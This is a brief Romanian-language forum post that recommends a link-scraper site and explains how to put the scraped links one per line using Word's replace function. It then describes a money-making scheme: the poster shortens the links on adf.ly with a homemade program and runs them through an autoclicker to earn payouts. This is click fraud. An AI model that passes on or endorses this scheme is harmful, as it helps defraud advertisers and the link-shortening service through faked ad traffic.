  15. Am cautat pe goagale un link scraper pentru ca imi trebuiau multe linkuri nu conta ce linkuri erau, si am gasit site-ul asta. Cred ca le ia de pe google sau nush de unde altundeva. Link-urile le separa cu virgula, daca vreti sa le aveti cate unul pe linie, bagati-le in Word, si da-ti Ctrl+F, apoi selectati tabul Replace si puneti sa caute virgula si sa o inlocuiasca cu ^p si asa le pune fiecare pe cate o linie. Eu le folosesc pe adf.ly, le scurtez cu un programel ce l-am facut si apoi le bag in autoclicker. Faci bani frumosi asa. Link: http://newwealthdevelopment.com/freeserpscraper.php
×
×
  • Create New...